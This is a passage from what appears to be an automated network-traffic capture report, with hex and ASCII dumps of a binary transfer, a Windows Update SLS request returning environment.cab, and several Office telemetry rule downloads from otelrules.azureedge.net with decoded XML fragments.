                                                                                                                  2024-11-14 14:00:14 UTC16384INData Raw: cc cc cc cc 57 56 53 48 83 ec 20 48 89 cb 48 89 d6 48 0f b6 3e 48 89 d9 89 fa e8 b5 52 00 00 48 8b 03 eb 13 66 0f b6 0c 3e 80 f9 80 73 0e 66 89 4c 78 fe 48 83 ef 01 48 85 ff 7f e8 90 48 85 ff 7e 0b 48 89 d9 48 89 f2 e8 57 cf 00 00 48 89 d8 48 83 c4 20 5b 5e 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc 41 55 57 56 53 48 83 ec 28 48 89 cb 48 89 d6 48 0f b6 3b 4c 8d 6b 01 48 89 f1 e8 d1 4f 00 00 66 41 0f b6 4d 00 48 0f b7 10 eb 16 48 83 c0 02 49 83 c5 01 40 80 ef 01 66 41 0f b6 4d 00 48 0f b7 10 40 84 ff 76 31 66 85 d2 74 2c 44 8b c2 66 41 f7 c0 80 ff 75 21 44 8b c1 66 41 f7 c0 80 00 75 16 44 8b c1 66 41 83 c8 20 44 8b ca 66 41 83 c9 20 66 45 3b c1 74 b4 66 85 d2 74 1f 66 f7 c2 80 ff 75 0b 66 f7 c1 80 00 75 04 33 c0 eb 13 48 89 d9 48 89 f2 e8 a7 fd ff ff eb 06
                                                                                                                  Data Ascii: WVSH HHH>HRHf>sfLxHHH~HHWHH [^_AUWVSH(HHH;LkHOfAMHHI@fAMH@v1ft,DfAu!DfAuDfA DfA fE;tftfufu3HH
                                                                                                                  2024-11-14 14:00:14 UTC1024INData Raw: e8 2f f7 ff ff 48 89 c7 48 89 f1 e8 e4 0a 00 00 48 89 c1 48 89 fa 4d 63 c5 e8 56 82 ff ff eb 0e 48 8d 40 f0 b9 01 00 00 00 f0 0f c1 48 08 48 8b 03 48 89 3b 48 85 c0 74 22 48 8d 40 f0 83 78 08 00 7e 18 83 ca ff 8b ca f0 0f c1 50 08 03 ca 85 c9 75 08 48 89 c1 e8 a9 7b ff ff 48 83 c4 28 5b 5e 5f 41 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 48 89 d0 48 85 c0 74 16 48 8d 40 f0 83 78 08 00 7c 0c 41 b8 01 00 00 00 f0 44 0f c1 40 08 48 8b 01 48 89 11 48 85 c0 74 22 48 8d 40 f0 83 78 08 00 7e 18 83 ca ff 8b ca f0 0f c1 50 08 03 ca 85 c9 75 08 48 89 c1 e8 41 7b ff ff 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc 33 c0 48 85 c9 74 03 8b 41 fc c3 cc cc cc cc cc 33 c0 48 85 c9 74 0e eb 03 83 c0 01 48 63 d0 80 3c 11 00 75 f4 c3 cc cc cc cc cc
                                                                                                                  Data Ascii: /HHHHMcVH@HHH;Ht"H@x~PuH{H([^_A]H(HHtH@x|AD@HHHt"H@x~PuHA{H(3HtA3HtHc<u
                                                                                                                  2024-11-14 14:00:14 UTC16384INData Raw: cc cc cc cc 48 89 54 24 10 48 89 c8 48 0f b6 00 48 8b 54 24 10 48 0f b6 12 44 8b c8 44 03 ca 45 3b c8 7e 05 41 8b d0 2b d0 44 8b c0 44 02 c2 44 88 01 41 b8 01 00 00 00 41 89 d1 44 89 c2 41 3b d1 7f 31 45 2b c8 41 83 c1 01 4c 8b 44 24 10 4d 8d 40 01 44 8b d0 44 03 d2 4d 63 d2 4d 0f b6 18 46 88 1c 11 83 c2 01 49 83 c0 01 41 83 e9 01 45 85 c9 75 df 90 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 88 54 24 38 48 8d 54 24 38 b8 01 00 00 00 45 89 c1 41 89 c0 e8 13 f7 ff ff 48 83 c4 28 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 28 33 c0 48 85 d2 74 10 48 89 d0 eb 04 48 83 c0 01 80 38 00 75 f7 2b c2 45 89 c1 41 89 c0 e8 da f6 ff ff 48 83 c4 28 c3 cc cc cc cc cc 48 83 ec 28 33 c0 48 85 d2 74 1c 48 89 d0 eb 04 48 83 c0 02 66 83 38 00 75 f6 48
                                                                                                                  Data Ascii: HT$HHHT$HDDE;~A+DDDAADA;1E+ALD$M@DDMcMFIAEuH(T$8HT$8EAH(H(3HtHH8u+EAH(H(3HtHHf8uH
                                                                                                                  2024-11-14 14:00:14 UTC1024INData Raw: cc cc cc cc 48 83 ec 28 48 85 d2 74 19 48 89 d0 4d 33 c9 48 8b 52 f8 48 89 54 24 20 48 89 c2 e8 10 00 00 00 eb 08 4c 89 c2 e8 66 01 00 00 48 83 c4 28 c3 cc 41 56 41 55 57 56 53 48 83 ec 30 48 89 54 24 20 4c 89 44 24 28 4c 89 cb 48 89 4c 24 60 33 ff 48 8b 44 24 20 48 85 c0 0f 84 09 01 00 00 48 8b 74 24 28 48 85 db 7d 0a 48 01 9c 24 80 00 00 00 33 db 48 8b 44 24 20 48 8b 40 f8 48 3b d8 7e 03 48 89 c3 48 2b c3 48 39 84 24 80 00 00 00 7e 08 48 89 84 24 80 00 00 00 48 83 bc 24 80 00 00 00 00 7d 0c 48 c7 84 24 80 00 00 00 00 00 00 00 48 83 bc 24 80 00 00 00 00 0f 8e a9 00 00 00 48 0f b6 46 01 48 03 f0 8b 46 02 48 8b 4e 06 48 85 c9 74 05 48 8b 31 eb 02 33 f6 4c 63 e8 4c 8b b4 24 80 00 00 00 4d 0f af f5 49 8d 4e 10 e8 e0 36 ff ff 48 89 c7 48 89 f8 c7 40 04 01 00
                                                                                                                  Data Ascii: H(HtHM3HRHT$ HLfH(AVAUWVSH0HT$ LD$(LHL$`3HD$ HHt$(H}H$3HD$ H@H;~HH+H9$~H$H$}H$H$HFHFHNHtH13LcL$MIN6HH@


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  44192.168.2.449796172.202.163.200443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:43 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rBgTCMhWGuf+1Pc&MD=RoRLZT8E HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                  Host: slscr.update.microsoft.com
                                                                                                                  2024-11-14 14:00:44 UTC560INHTTP/1.1 200 OK
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Pragma: no-cache
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Expires: -1
                                                                                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                  ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                  MS-CorrelationId: c103e2b4-b541-4952-bcd3-ac32fbc1d741
                                                                                                                  MS-RequestId: cda27193-5775-43ad-a4ae-9632df226673
                                                                                                                  MS-CV: G6+r4YhVx0Gr52Q9.0
                                                                                                                  X-Microsoft-SLSClientCache: 1440
                                                                                                                  Content-Disposition: attachment; filename=environment.cab
                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:43 GMT
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 30005
                                                                                                                  2024-11-14 14:00:44 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                  Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                  2024-11-14 14:00:44 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                  Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  45192.168.2.44979813.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:44 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:44 UTC471INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:44 GMT
                                                                                                                  Content-Type: text/plain
                                                                                                                  Content-Length: 218853
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public
                                                                                                                  Last-Modified: Wed, 13 Nov 2024 03:39:40 GMT
                                                                                                                  ETag: "0x8DD0394CDDBD898"
                                                                                                                  x-ms-request-id: 406a0d50-a01e-0002-58e4-355074000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140044Z-16547b76f7fr4g8xhC1DFW9cqc0000000hz0000000006rvk
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:44 UTC15913INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                  Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                  2024-11-14 14:00:44 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20
                                                                                                                  Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
                                                                                                                  2024-11-14 14:00:45 UTC16384INData Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d
                                                                                                                  Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
                                                                                                                  2024-11-14 14:00:45 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
                                                                                                                  Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
                                                                                                                  2024-11-14 14:00:45 UTC16384INData Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20
                                                                                                                  Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
                                                                                                                  2024-11-14 14:00:45 UTC16384INData Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e
                                                                                                                  Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
                                                                                                                  2024-11-14 14:00:45 UTC16384INData Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22
                                                                                                                  Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
                                                                                                                  2024-11-14 14:00:45 UTC16384INData Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43
                                                                                                                  Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
                                                                                                                  2024-11-14 14:00:45 UTC16384INData Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
                                                                                                                  Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
                                                                                                                  2024-11-14 14:00:45 UTC16384INData Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20
                                                                                                                  Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  46192.168.2.44980213.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:46 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:00:46 UTC494INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:46 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 2980
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                  ETag: "0x8DC582BA80D96A1"
                                                                                                                  x-ms-request-id: 26663d07-401e-0029-2faf-319b43000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140046Z-16547b76f7f775p5hC1DFWzdvn0000000kq000000000c437
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:46 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  47192.168.2.44980413.107.246.45443
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-11-14 14:00:46 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
